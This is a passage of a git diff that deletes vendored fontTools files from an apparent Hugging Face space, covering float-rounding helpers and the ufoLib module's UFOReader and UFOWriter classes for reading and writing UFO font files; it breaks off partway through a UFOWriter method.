fractional values, truncate. - - This function rounds the floating-point value according to this strategy - in preparation for conversion to fixed-point. - - Args: - value (float): The input floating-point value. - - Returns - float: The rounded value. 
- """ - # See this thread for how we ended up with this implementation: - # https://github.com/fonttools/fonttools/issues/1248#issuecomment-383198166 - return int(math.floor(value + 0.5)) - - -def maybeRound(v, tolerance, round=otRound): - rounded = round(v) - return rounded if abs(rounded - v) <= tolerance else v - - -def roundFunc(tolerance, round=otRound): - if tolerance < 0: - raise ValueError("Rounding tolerance must be positive") - - if tolerance == 0: - return noRound - - if tolerance >= 0.5: - return round - - return functools.partial(maybeRound, tolerance=tolerance, round=round) - - -def nearestMultipleShortestRepr(value: float, factor: float) -> str: - """Round to nearest multiple of factor and return shortest decimal representation. - - This chooses the float that is closer to a multiple of the given factor while - having the shortest decimal representation (the least number of fractional decimal - digits). - - For example, given the following: - - >>> nearestMultipleShortestRepr(-0.61883544921875, 1.0/(1<<14)) - '-0.61884' - - Useful when you need to serialize or print a fixed-point number (or multiples - thereof, such as F2Dot14 fractions of 180 degrees in COLRv1 PaintRotate) in - a human-readable form. - - Args: - value (value): The value to be rounded and serialized. - factor (float): The value which the result is a close multiple of. - - Returns: - str: A compact string representation of the value. - """ - if not value: - return "0.0" - - value = otRound(value / factor) * factor - eps = 0.5 * factor - lo = value - eps - hi = value + eps - # If the range of valid choices spans an integer, return the integer. - if int(lo) != int(hi): - return str(float(round(value))) - - fmt = "%.8f" - lo = fmt % lo - hi = fmt % hi - assert len(lo) == len(hi) and lo != hi - for i in range(len(lo)): - if lo[i] != hi[i]: - break - period = lo.find(".") - assert period < i - fmt = "%%.%df" % (i - period) - return fmt % value diff --git a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fontTools/ufoLib/__init__.py b/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fontTools/ufoLib/__init__.py deleted file mode 100644 index 1a456a206f815ffdf624e4c420539a9eaf1903ca..0000000000000000000000000000000000000000 --- a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fontTools/ufoLib/__init__.py +++ /dev/null @@ -1,2464 +0,0 @@ -import os -from copy import deepcopy -from os import fsdecode -import logging -import zipfile -import enum -from collections import OrderedDict -import fs -import fs.base -import fs.subfs -import fs.errors -import fs.copy -import fs.osfs -import fs.zipfs -import fs.tempfs -import fs.tools -from fontTools.misc import plistlib -from fontTools.ufoLib.validators import * -from fontTools.ufoLib.filenames import userNameToFileName -from fontTools.ufoLib.converters import convertUFO1OrUFO2KerningToUFO3Kerning -from fontTools.ufoLib.errors import UFOLibError -from fontTools.ufoLib.utils import numberTypes, _VersionTupleEnumMixin - -""" -A library for importing .ufo files and their descendants. -Refer to http://unifiedfontobject.com for the UFO specification. - -The UFOReader and UFOWriter classes support versions 1, 2 and 3 -of the specification. - -Sets that list the font info attribute names for the fontinfo.plist -formats are available for external use. 
These are: - fontInfoAttributesVersion1 - fontInfoAttributesVersion2 - fontInfoAttributesVersion3 - -A set listing the fontinfo.plist attributes that were deprecated -in version 2 is available for external use: - deprecatedFontInfoAttributesVersion2 - -Functions that do basic validation on values for fontinfo.plist -are available for external use. These are - validateFontInfoVersion2ValueForAttribute - validateFontInfoVersion3ValueForAttribute - -Value conversion functions are available for converting -fontinfo.plist values between the possible format versions. - convertFontInfoValueForAttributeFromVersion1ToVersion2 - convertFontInfoValueForAttributeFromVersion2ToVersion1 - convertFontInfoValueForAttributeFromVersion2ToVersion3 - convertFontInfoValueForAttributeFromVersion3ToVersion2 -""" - -__all__ = [ - "makeUFOPath", - "UFOLibError", - "UFOReader", - "UFOWriter", - "UFOReaderWriter", - "UFOFileStructure", - "fontInfoAttributesVersion1", - "fontInfoAttributesVersion2", - "fontInfoAttributesVersion3", - "deprecatedFontInfoAttributesVersion2", - "validateFontInfoVersion2ValueForAttribute", - "validateFontInfoVersion3ValueForAttribute", - "convertFontInfoValueForAttributeFromVersion1ToVersion2", - "convertFontInfoValueForAttributeFromVersion2ToVersion1", -] - -__version__ = "3.0.0" - - -logger = logging.getLogger(__name__) - - -# --------- -# Constants -# --------- - -DEFAULT_GLYPHS_DIRNAME = "glyphs" -DATA_DIRNAME = "data" -IMAGES_DIRNAME = "images" -METAINFO_FILENAME = "metainfo.plist" -FONTINFO_FILENAME = "fontinfo.plist" -LIB_FILENAME = "lib.plist" -GROUPS_FILENAME = "groups.plist" -KERNING_FILENAME = "kerning.plist" -FEATURES_FILENAME = "features.fea" -LAYERCONTENTS_FILENAME = "layercontents.plist" -LAYERINFO_FILENAME = "layerinfo.plist" - -DEFAULT_LAYER_NAME = "public.default" - - -class UFOFormatVersion(tuple, _VersionTupleEnumMixin, enum.Enum): - FORMAT_1_0 = (1, 0) - FORMAT_2_0 = (2, 0) - FORMAT_3_0 = (3, 0) - - -# python 3.11 doesn't like when a mixin overrides a dunder method like __str__ -# for some reasons it keep using Enum.__str__, see -# https://github.com/fonttools/fonttools/pull/2655 -UFOFormatVersion.__str__ = _VersionTupleEnumMixin.__str__ - - -class UFOFileStructure(enum.Enum): - ZIP = "zip" - PACKAGE = "package" - - -# -------------- -# Shared Methods -# -------------- - - -class _UFOBaseIO: - def getFileModificationTime(self, path): - """ - Returns the modification time for the file at the given path, as a - floating point number giving the number of seconds since the epoch. - The path must be relative to the UFO path. - Returns None if the file does not exist. - """ - try: - dt = self.fs.getinfo(fsdecode(path), namespaces=["details"]).modified - except (fs.errors.MissingInfoNamespace, fs.errors.ResourceNotFound): - return None - else: - return dt.timestamp() - - def _getPlist(self, fileName, default=None): - """ - Read a property list relative to the UFO filesystem's root. - Raises UFOLibError if the file is missing and default is None, - otherwise default is returned. - - The errors that could be raised during the reading of a plist are - unpredictable and/or too large to list, so, a blind try: except: - is done. If an exception occurs, a UFOLibError will be raised. - """ - try: - with self.fs.open(fileName, "rb") as f: - return plistlib.load(f) - except fs.errors.ResourceNotFound: - if default is None: - raise UFOLibError( - "'%s' is missing on %s. 
This file is required" % (fileName, self.fs) - ) - else: - return default - except Exception as e: - # TODO(anthrotype): try to narrow this down a little - raise UFOLibError(f"'{fileName}' could not be read on {self.fs}: {e}") - - def _writePlist(self, fileName, obj): - """ - Write a property list to a file relative to the UFO filesystem's root. - - Do this sort of atomically, making it harder to corrupt existing files, - for example when plistlib encounters an error halfway during write. - This also checks to see if text matches the text that is already in the - file at path. If so, the file is not rewritten so that the modification - date is preserved. - - The errors that could be raised during the writing of a plist are - unpredictable and/or too large to list, so, a blind try: except: is done. - If an exception occurs, a UFOLibError will be raised. - """ - if self._havePreviousFile: - try: - data = plistlib.dumps(obj) - except Exception as e: - raise UFOLibError( - "'%s' could not be written on %s because " - "the data is not properly formatted: %s" % (fileName, self.fs, e) - ) - if self.fs.exists(fileName) and data == self.fs.readbytes(fileName): - return - self.fs.writebytes(fileName, data) - else: - with self.fs.openbin(fileName, mode="w") as fp: - try: - plistlib.dump(obj, fp) - except Exception as e: - raise UFOLibError( - "'%s' could not be written on %s because " - "the data is not properly formatted: %s" - % (fileName, self.fs, e) - ) - - -# ---------- -# UFO Reader -# ---------- - - -class UFOReader(_UFOBaseIO): - - """ - Read the various components of the .ufo. - - By default read data is validated. Set ``validate`` to - ``False`` to not validate the data. - """ - - def __init__(self, path, validate=True): - if hasattr(path, "__fspath__"): # support os.PathLike objects - path = path.__fspath__() - - if isinstance(path, str): - structure = _sniffFileStructure(path) - try: - if structure is UFOFileStructure.ZIP: - parentFS = fs.zipfs.ZipFS(path, write=False, encoding="utf-8") - else: - parentFS = fs.osfs.OSFS(path) - except fs.errors.CreateFailed as e: - raise UFOLibError(f"unable to open '{path}': {e}") - - if structure is UFOFileStructure.ZIP: - # .ufoz zip files must contain a single root directory, with arbitrary - # name, containing all the UFO files - rootDirs = [ - p.name - for p in parentFS.scandir("/") - # exclude macOS metadata contained in zip file - if p.is_dir and p.name != "__MACOSX" - ] - if len(rootDirs) == 1: - # 'ClosingSubFS' ensures that the parent zip file is closed when - # its root subdirectory is closed - self.fs = parentFS.opendir( - rootDirs[0], factory=fs.subfs.ClosingSubFS - ) - else: - raise UFOLibError( - "Expected exactly 1 root directory, found %d" % len(rootDirs) - ) - else: - # normal UFO 'packages' are just a single folder - self.fs = parentFS - # when passed a path string, we make sure we close the newly opened fs - # upon calling UFOReader.close method or context manager's __exit__ - self._shouldClose = True - self._fileStructure = structure - elif isinstance(path, fs.base.FS): - filesystem = path - try: - filesystem.check() - except fs.errors.FilesystemClosed: - raise UFOLibError("the filesystem '%s' is closed" % path) - else: - self.fs = filesystem - try: - path = filesystem.getsyspath("/") - except fs.errors.NoSysPath: - # network or in-memory FS may not map to the local one - path = str(filesystem) - # when user passed an already initialized fs instance, it is her - # responsibility to close it, thus UFOReader.close/__exit__ are no-op - 
self._shouldClose = False - # default to a 'package' structure - self._fileStructure = UFOFileStructure.PACKAGE - else: - raise TypeError( - "Expected a path string or fs.base.FS object, found '%s'" - % type(path).__name__ - ) - self._path = fsdecode(path) - self._validate = validate - self._upConvertedKerningData = None - - try: - self.readMetaInfo(validate=validate) - except UFOLibError: - self.close() - raise - - # properties - - def _get_path(self): - import warnings - - warnings.warn( - "The 'path' attribute is deprecated; use the 'fs' attribute instead", - DeprecationWarning, - stacklevel=2, - ) - return self._path - - path = property(_get_path, doc="The path of the UFO (DEPRECATED).") - - def _get_formatVersion(self): - import warnings - - warnings.warn( - "The 'formatVersion' attribute is deprecated; use the 'formatVersionTuple'", - DeprecationWarning, - stacklevel=2, - ) - return self._formatVersion.major - - formatVersion = property( - _get_formatVersion, - doc="The (major) format version of the UFO. DEPRECATED: Use formatVersionTuple", - ) - - @property - def formatVersionTuple(self): - """The (major, minor) format version of the UFO. - This is determined by reading metainfo.plist during __init__. - """ - return self._formatVersion - - def _get_fileStructure(self): - return self._fileStructure - - fileStructure = property( - _get_fileStructure, - doc=( - "The file structure of the UFO: " - "either UFOFileStructure.ZIP or UFOFileStructure.PACKAGE" - ), - ) - - # up conversion - - def _upConvertKerning(self, validate): - """ - Up convert kerning and groups in UFO 1 and 2. - The data will be held internally until each bit of data - has been retrieved. The conversion of both must be done - at once, so the raw data is cached and an error is raised - if one bit of data becomes obsolete before it is called. - - ``validate`` will validate the data. - """ - if self._upConvertedKerningData: - testKerning = self._readKerning() - if testKerning != self._upConvertedKerningData["originalKerning"]: - raise UFOLibError( - "The data in kerning.plist has been modified since it was converted to UFO 3 format." - ) - testGroups = self._readGroups() - if testGroups != self._upConvertedKerningData["originalGroups"]: - raise UFOLibError( - "The data in groups.plist has been modified since it was converted to UFO 3 format." - ) - else: - groups = self._readGroups() - if validate: - invalidFormatMessage = "groups.plist is not properly formatted." - if not isinstance(groups, dict): - raise UFOLibError(invalidFormatMessage) - for groupName, glyphList in groups.items(): - if not isinstance(groupName, str): - raise UFOLibError(invalidFormatMessage) - elif not isinstance(glyphList, list): - raise UFOLibError(invalidFormatMessage) - for glyphName in glyphList: - if not isinstance(glyphName, str): - raise UFOLibError(invalidFormatMessage) - self._upConvertedKerningData = dict( - kerning={}, - originalKerning=self._readKerning(), - groups={}, - originalGroups=groups, - ) - # convert kerning and groups - kerning, groups, conversionMaps = convertUFO1OrUFO2KerningToUFO3Kerning( - self._upConvertedKerningData["originalKerning"], - deepcopy(self._upConvertedKerningData["originalGroups"]), - self.getGlyphSet(), - ) - # store - self._upConvertedKerningData["kerning"] = kerning - self._upConvertedKerningData["groups"] = groups - self._upConvertedKerningData["groupRenameMaps"] = conversionMaps - - # support methods - - def readBytesFromPath(self, path): - """ - Returns the bytes in the file at the given path. 
- The path must be relative to the UFO's filesystem root. - Returns None if the file does not exist. - """ - try: - return self.fs.readbytes(fsdecode(path)) - except fs.errors.ResourceNotFound: - return None - - def getReadFileForPath(self, path, encoding=None): - """ - Returns a file (or file-like) object for the file at the given path. - The path must be relative to the UFO path. - Returns None if the file does not exist. - By default the file is opened in binary mode (reads bytes). - If encoding is passed, the file is opened in text mode (reads str). - - Note: The caller is responsible for closing the open file. - """ - path = fsdecode(path) - try: - if encoding is None: - return self.fs.openbin(path) - else: - return self.fs.open(path, mode="r", encoding=encoding) - except fs.errors.ResourceNotFound: - return None - - # metainfo.plist - - def _readMetaInfo(self, validate=None): - """ - Read metainfo.plist and return raw data. Only used for internal operations. - - ``validate`` will validate the read data, by default it is set - to the class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - data = self._getPlist(METAINFO_FILENAME) - if validate and not isinstance(data, dict): - raise UFOLibError("metainfo.plist is not properly formatted.") - try: - formatVersionMajor = data["formatVersion"] - except KeyError: - raise UFOLibError( - f"Missing required formatVersion in '{METAINFO_FILENAME}' on {self.fs}" - ) - formatVersionMinor = data.setdefault("formatVersionMinor", 0) - - try: - formatVersion = UFOFormatVersion((formatVersionMajor, formatVersionMinor)) - except ValueError as e: - unsupportedMsg = ( - f"Unsupported UFO format ({formatVersionMajor}.{formatVersionMinor}) " - f"in '{METAINFO_FILENAME}' on {self.fs}" - ) - if validate: - from fontTools.ufoLib.errors import UnsupportedUFOFormat - - raise UnsupportedUFOFormat(unsupportedMsg) from e - - formatVersion = UFOFormatVersion.default() - logger.warning( - "%s. Assuming the latest supported version (%s). " - "Some data may be skipped or parsed incorrectly", - unsupportedMsg, - formatVersion, - ) - data["formatVersionTuple"] = formatVersion - return data - - def readMetaInfo(self, validate=None): - """ - Read metainfo.plist and set formatVersion. Only used for internal operations. - - ``validate`` will validate the read data, by default it is set - to the class's validate value, can be overridden. - """ - data = self._readMetaInfo(validate=validate) - self._formatVersion = data["formatVersionTuple"] - - # groups.plist - - def _readGroups(self): - groups = self._getPlist(GROUPS_FILENAME, {}) - # remove any duplicate glyphs in a kerning group - for groupName, glyphList in groups.items(): - if groupName.startswith(("public.kern1.", "public.kern2.")): - groups[groupName] = list(OrderedDict.fromkeys(glyphList)) - return groups - - def readGroups(self, validate=None): - """ - Read groups.plist. Returns a dict. - ``validate`` will validate the read data, by default it is set to the - class's validate value, can be overridden. 
- """ - if validate is None: - validate = self._validate - # handle up conversion - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - self._upConvertKerning(validate) - groups = self._upConvertedKerningData["groups"] - # normal - else: - groups = self._readGroups() - if validate: - valid, message = groupsValidator(groups) - if not valid: - raise UFOLibError(message) - return groups - - def getKerningGroupConversionRenameMaps(self, validate=None): - """ - Get maps defining the renaming that was done during any - needed kerning group conversion. This method returns a - dictionary of this form:: - - { - "side1" : {"old group name" : "new group name"}, - "side2" : {"old group name" : "new group name"} - } - - When no conversion has been performed, the side1 and side2 - dictionaries will be empty. - - ``validate`` will validate the groups, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - if self._formatVersion >= UFOFormatVersion.FORMAT_3_0: - return dict(side1={}, side2={}) - # use the public group reader to force the load and - # conversion of the data if it hasn't happened yet. - self.readGroups(validate=validate) - return self._upConvertedKerningData["groupRenameMaps"] - - # fontinfo.plist - - def _readInfo(self, validate): - data = self._getPlist(FONTINFO_FILENAME, {}) - if validate and not isinstance(data, dict): - raise UFOLibError("fontinfo.plist is not properly formatted.") - return data - - def readInfo(self, info, validate=None): - """ - Read fontinfo.plist. It requires an object that allows - setting attributes with names that follow the fontinfo.plist - version 3 specification. This will write the attributes - defined in the file into the object. - - ``validate`` will validate the read data, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - infoDict = self._readInfo(validate) - infoDataToSet = {} - # version 1 - if self._formatVersion == UFOFormatVersion.FORMAT_1_0: - for attr in fontInfoAttributesVersion1: - value = infoDict.get(attr) - if value is not None: - infoDataToSet[attr] = value - infoDataToSet = _convertFontInfoDataVersion1ToVersion2(infoDataToSet) - infoDataToSet = _convertFontInfoDataVersion2ToVersion3(infoDataToSet) - # version 2 - elif self._formatVersion == UFOFormatVersion.FORMAT_2_0: - for attr, dataValidationDict in list( - fontInfoAttributesVersion2ValueData.items() - ): - value = infoDict.get(attr) - if value is None: - continue - infoDataToSet[attr] = value - infoDataToSet = _convertFontInfoDataVersion2ToVersion3(infoDataToSet) - # version 3.x - elif self._formatVersion.major == UFOFormatVersion.FORMAT_3_0.major: - for attr, dataValidationDict in list( - fontInfoAttributesVersion3ValueData.items() - ): - value = infoDict.get(attr) - if value is None: - continue - infoDataToSet[attr] = value - # unsupported version - else: - raise NotImplementedError(self._formatVersion) - # validate data - if validate: - infoDataToSet = validateInfoVersion3Data(infoDataToSet) - # populate the object - for attr, value in list(infoDataToSet.items()): - try: - setattr(info, attr, value) - except AttributeError: - raise UFOLibError( - "The supplied info object does not support setting a necessary attribute (%s)." - % attr - ) - - # kerning.plist - - def _readKerning(self): - data = self._getPlist(KERNING_FILENAME, {}) - return data - - def readKerning(self, validate=None): - """ - Read kerning.plist. 
Returns a dict. - - ``validate`` will validate the kerning data, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - # handle up conversion - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - self._upConvertKerning(validate) - kerningNested = self._upConvertedKerningData["kerning"] - # normal - else: - kerningNested = self._readKerning() - if validate: - valid, message = kerningValidator(kerningNested) - if not valid: - raise UFOLibError(message) - # flatten - kerning = {} - for left in kerningNested: - for right in kerningNested[left]: - value = kerningNested[left][right] - kerning[left, right] = value - return kerning - - # lib.plist - - def readLib(self, validate=None): - """ - Read lib.plist. Returns a dict. - - ``validate`` will validate the data, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - data = self._getPlist(LIB_FILENAME, {}) - if validate: - valid, message = fontLibValidator(data) - if not valid: - raise UFOLibError(message) - return data - - # features.fea - - def readFeatures(self): - """ - Read features.fea. Return a string. - The returned string is empty if the file is missing. - """ - try: - with self.fs.open(FEATURES_FILENAME, "r", encoding="utf-8") as f: - return f.read() - except fs.errors.ResourceNotFound: - return "" - - # glyph sets & layers - - def _readLayerContents(self, validate): - """ - Rebuild the layer contents list by checking what glyphsets - are available on disk. - - ``validate`` will validate the layer contents. - """ - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - return [(DEFAULT_LAYER_NAME, DEFAULT_GLYPHS_DIRNAME)] - contents = self._getPlist(LAYERCONTENTS_FILENAME) - if validate: - valid, error = layerContentsValidator(contents, self.fs) - if not valid: - raise UFOLibError(error) - return contents - - def getLayerNames(self, validate=None): - """ - Get the ordered layer names from layercontents.plist. - - ``validate`` will validate the data, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - layerContents = self._readLayerContents(validate) - layerNames = [layerName for layerName, directoryName in layerContents] - return layerNames - - def getDefaultLayerName(self, validate=None): - """ - Get the default layer name from layercontents.plist. - - ``validate`` will validate the data, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - layerContents = self._readLayerContents(validate) - for layerName, layerDirectory in layerContents: - if layerDirectory == DEFAULT_GLYPHS_DIRNAME: - return layerName - # this will already have been raised during __init__ - raise UFOLibError("The default layer is not defined in layercontents.plist.") - - def getGlyphSet(self, layerName=None, validateRead=None, validateWrite=None): - """ - Return the GlyphSet associated with the - glyphs directory mapped to layerName - in the UFO. If layerName is not provided, - the name retrieved with getDefaultLayerName - will be used. - - ``validateRead`` will validate the read data, by default it is set to the - class's validate value, can be overridden. - ``validateWrite`` will validate the written data, by default it is set to the - class's validate value, can be overridden. 
- """ - from fontTools.ufoLib.glifLib import GlyphSet - - if validateRead is None: - validateRead = self._validate - if validateWrite is None: - validateWrite = self._validate - if layerName is None: - layerName = self.getDefaultLayerName(validate=validateRead) - directory = None - layerContents = self._readLayerContents(validateRead) - for storedLayerName, storedLayerDirectory in layerContents: - if layerName == storedLayerName: - directory = storedLayerDirectory - break - if directory is None: - raise UFOLibError('No glyphs directory is mapped to "%s".' % layerName) - try: - glyphSubFS = self.fs.opendir(directory) - except fs.errors.ResourceNotFound: - raise UFOLibError(f"No '{directory}' directory for layer '{layerName}'") - return GlyphSet( - glyphSubFS, - ufoFormatVersion=self._formatVersion, - validateRead=validateRead, - validateWrite=validateWrite, - expectContentsFile=True, - ) - - def getCharacterMapping(self, layerName=None, validate=None): - """ - Return a dictionary that maps unicode values (ints) to - lists of glyph names. - """ - if validate is None: - validate = self._validate - glyphSet = self.getGlyphSet( - layerName, validateRead=validate, validateWrite=True - ) - allUnicodes = glyphSet.getUnicodes() - cmap = {} - for glyphName, unicodes in allUnicodes.items(): - for code in unicodes: - if code in cmap: - cmap[code].append(glyphName) - else: - cmap[code] = [glyphName] - return cmap - - # /data - - def getDataDirectoryListing(self): - """ - Returns a list of all files in the data directory. - The returned paths will be relative to the UFO. - This will not list directory names, only file names. - Thus, empty directories will be skipped. - """ - try: - self._dataFS = self.fs.opendir(DATA_DIRNAME) - except fs.errors.ResourceNotFound: - return [] - except fs.errors.DirectoryExpected: - raise UFOLibError('The UFO contains a "data" file instead of a directory.') - try: - # fs Walker.files method returns "absolute" paths (in terms of the - # root of the 'data' SubFS), so we strip the leading '/' to make - # them relative - return [p.lstrip("/") for p in self._dataFS.walk.files()] - except fs.errors.ResourceError: - return [] - - def getImageDirectoryListing(self, validate=None): - """ - Returns a list of all image file names in - the images directory. Each of the images will - have been verified to have the PNG signature. - - ``validate`` will validate the data, by default it is set to the - class's validate value, can be overridden. - """ - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - return [] - if validate is None: - validate = self._validate - try: - self._imagesFS = imagesFS = self.fs.opendir(IMAGES_DIRNAME) - except fs.errors.ResourceNotFound: - return [] - except fs.errors.DirectoryExpected: - raise UFOLibError( - 'The UFO contains an "images" file instead of a directory.' - ) - result = [] - for path in imagesFS.scandir("/"): - if path.is_dir: - # silently skip this as version control - # systems often have hidden directories - continue - if validate: - with imagesFS.openbin(path.name) as fp: - valid, error = pngValidator(fileObj=fp) - if valid: - result.append(path.name) - else: - result.append(path.name) - return result - - def readData(self, fileName): - """ - Return bytes for the file named 'fileName' inside the 'data/' directory. 
- """ - fileName = fsdecode(fileName) - try: - try: - dataFS = self._dataFS - except AttributeError: - # in case readData is called before getDataDirectoryListing - dataFS = self.fs.opendir(DATA_DIRNAME) - data = dataFS.readbytes(fileName) - except fs.errors.ResourceNotFound: - raise UFOLibError(f"No data file named '{fileName}' on {self.fs}") - return data - - def readImage(self, fileName, validate=None): - """ - Return image data for the file named fileName. - - ``validate`` will validate the data, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - raise UFOLibError( - f"Reading images is not allowed in UFO {self._formatVersion.major}." - ) - fileName = fsdecode(fileName) - try: - try: - imagesFS = self._imagesFS - except AttributeError: - # in case readImage is called before getImageDirectoryListing - imagesFS = self.fs.opendir(IMAGES_DIRNAME) - data = imagesFS.readbytes(fileName) - except fs.errors.ResourceNotFound: - raise UFOLibError(f"No image file named '{fileName}' on {self.fs}") - if validate: - valid, error = pngValidator(data=data) - if not valid: - raise UFOLibError(error) - return data - - def close(self): - if self._shouldClose: - self.fs.close() - - def __enter__(self): - return self - - def __exit__(self, exc_type, exc_value, exc_tb): - self.close() - - -# ---------- -# UFO Writer -# ---------- - - -class UFOWriter(UFOReader): - - """ - Write the various components of the .ufo. - - By default, the written data will be validated before writing. Set ``validate`` to - ``False`` if you do not want to validate the data. Validation can also be overriden - on a per method level if desired. - - The ``formatVersion`` argument allows to specify the UFO format version as a tuple - of integers (major, minor), or as a single integer for the major digit only (minor - is implied as 0). By default the latest formatVersion will be used; currently it's - 3.0, which is equivalent to formatVersion=(3, 0). - - An UnsupportedUFOFormat exception is raised if the requested UFO formatVersion is - not supported. 
- """ - - def __init__( - self, - path, - formatVersion=None, - fileCreator="com.github.fonttools.ufoLib", - structure=None, - validate=True, - ): - try: - formatVersion = UFOFormatVersion(formatVersion) - except ValueError as e: - from fontTools.ufoLib.errors import UnsupportedUFOFormat - - raise UnsupportedUFOFormat( - f"Unsupported UFO format: {formatVersion!r}" - ) from e - - if hasattr(path, "__fspath__"): # support os.PathLike objects - path = path.__fspath__() - - if isinstance(path, str): - # normalize path by removing trailing or double slashes - path = os.path.normpath(path) - havePreviousFile = os.path.exists(path) - if havePreviousFile: - # ensure we use the same structure as the destination - existingStructure = _sniffFileStructure(path) - if structure is not None: - try: - structure = UFOFileStructure(structure) - except ValueError: - raise UFOLibError( - "Invalid or unsupported structure: '%s'" % structure - ) - if structure is not existingStructure: - raise UFOLibError( - "A UFO with a different structure (%s) already exists " - "at the given path: '%s'" % (existingStructure, path) - ) - else: - structure = existingStructure - else: - # if not exists, default to 'package' structure - if structure is None: - structure = UFOFileStructure.PACKAGE - dirName = os.path.dirname(path) - if dirName and not os.path.isdir(dirName): - raise UFOLibError( - "Cannot write to '%s': directory does not exist" % path - ) - if structure is UFOFileStructure.ZIP: - if havePreviousFile: - # we can't write a zip in-place, so we have to copy its - # contents to a temporary location and work from there, then - # upon closing UFOWriter we create the final zip file - parentFS = fs.tempfs.TempFS() - with fs.zipfs.ZipFS(path, encoding="utf-8") as origFS: - fs.copy.copy_fs(origFS, parentFS) - # if output path is an existing zip, we require that it contains - # one, and only one, root directory (with arbitrary name), in turn - # containing all the existing UFO contents - rootDirs = [ - p.name - for p in parentFS.scandir("/") - # exclude macOS metadata contained in zip file - if p.is_dir and p.name != "__MACOSX" - ] - if len(rootDirs) != 1: - raise UFOLibError( - "Expected exactly 1 root directory, found %d" - % len(rootDirs) - ) - else: - # 'ClosingSubFS' ensures that the parent filesystem is closed - # when its root subdirectory is closed - self.fs = parentFS.opendir( - rootDirs[0], factory=fs.subfs.ClosingSubFS - ) - else: - # if the output zip file didn't exist, we create the root folder; - # we name it the same as input 'path', but with '.ufo' extension - rootDir = os.path.splitext(os.path.basename(path))[0] + ".ufo" - parentFS = fs.zipfs.ZipFS(path, write=True, encoding="utf-8") - parentFS.makedir(rootDir) - self.fs = parentFS.opendir(rootDir, factory=fs.subfs.ClosingSubFS) - else: - self.fs = fs.osfs.OSFS(path, create=True) - self._fileStructure = structure - self._havePreviousFile = havePreviousFile - self._shouldClose = True - elif isinstance(path, fs.base.FS): - filesystem = path - try: - filesystem.check() - except fs.errors.FilesystemClosed: - raise UFOLibError("the filesystem '%s' is closed" % path) - else: - self.fs = filesystem - try: - path = filesystem.getsyspath("/") - except fs.errors.NoSysPath: - # network or in-memory FS may not map to the local one - path = str(filesystem) - # if passed an FS object, always use 'package' structure - if structure and structure is not UFOFileStructure.PACKAGE: - import warnings - - warnings.warn( - "The 'structure' argument is not used when input is an 
FS object", - UserWarning, - stacklevel=2, - ) - self._fileStructure = UFOFileStructure.PACKAGE - # if FS contains a "metainfo.plist", we consider it non-empty - self._havePreviousFile = filesystem.exists(METAINFO_FILENAME) - # the user is responsible for closing the FS object - self._shouldClose = False - else: - raise TypeError( - "Expected a path string or fs object, found %s" % type(path).__name__ - ) - - # establish some basic stuff - self._path = fsdecode(path) - self._formatVersion = formatVersion - self._fileCreator = fileCreator - self._downConversionKerningData = None - self._validate = validate - # if the file already exists, get the format version. - # this will be needed for up and down conversion. - previousFormatVersion = None - if self._havePreviousFile: - metaInfo = self._readMetaInfo(validate=validate) - previousFormatVersion = metaInfo["formatVersionTuple"] - # catch down conversion - if previousFormatVersion > formatVersion: - from fontTools.ufoLib.errors import UnsupportedUFOFormat - - raise UnsupportedUFOFormat( - "The UFO located at this path is a higher version " - f"({previousFormatVersion}) than the version ({formatVersion}) " - "that is trying to be written. This is not supported." - ) - # handle the layer contents - self.layerContents = {} - if previousFormatVersion is not None and previousFormatVersion.major >= 3: - # already exists - self.layerContents = OrderedDict(self._readLayerContents(validate)) - else: - # previous < 3 - # imply the layer contents - if self.fs.exists(DEFAULT_GLYPHS_DIRNAME): - self.layerContents = {DEFAULT_LAYER_NAME: DEFAULT_GLYPHS_DIRNAME} - # write the new metainfo - self._writeMetaInfo() - - # properties - - def _get_fileCreator(self): - return self._fileCreator - - fileCreator = property( - _get_fileCreator, - doc="The file creator of the UFO. This is set into metainfo.plist during __init__.", - ) - - # support methods for file system interaction - - def copyFromReader(self, reader, sourcePath, destPath): - """ - Copy the sourcePath in the provided UFOReader to destPath - in this writer. The paths must be relative. This works with - both individual files and directories. - """ - if not isinstance(reader, UFOReader): - raise UFOLibError("The reader must be an instance of UFOReader.") - sourcePath = fsdecode(sourcePath) - destPath = fsdecode(destPath) - if not reader.fs.exists(sourcePath): - raise UFOLibError( - 'The reader does not have data located at "%s".' % sourcePath - ) - if self.fs.exists(destPath): - raise UFOLibError('A file named "%s" already exists.' % destPath) - # create the destination directory if it doesn't exist - self.fs.makedirs(fs.path.dirname(destPath), recreate=True) - if reader.fs.isdir(sourcePath): - fs.copy.copy_dir(reader.fs, sourcePath, self.fs, destPath) - else: - fs.copy.copy_file(reader.fs, sourcePath, self.fs, destPath) - - def writeBytesToPath(self, path, data): - """ - Write bytes to a path relative to the UFO filesystem's root. - If writing to an existing UFO, check to see if data matches the data - that is already in the file at path; if so, the file is not rewritten - so that the modification date is preserved. - If needed, the directory tree for the given path will be built. 
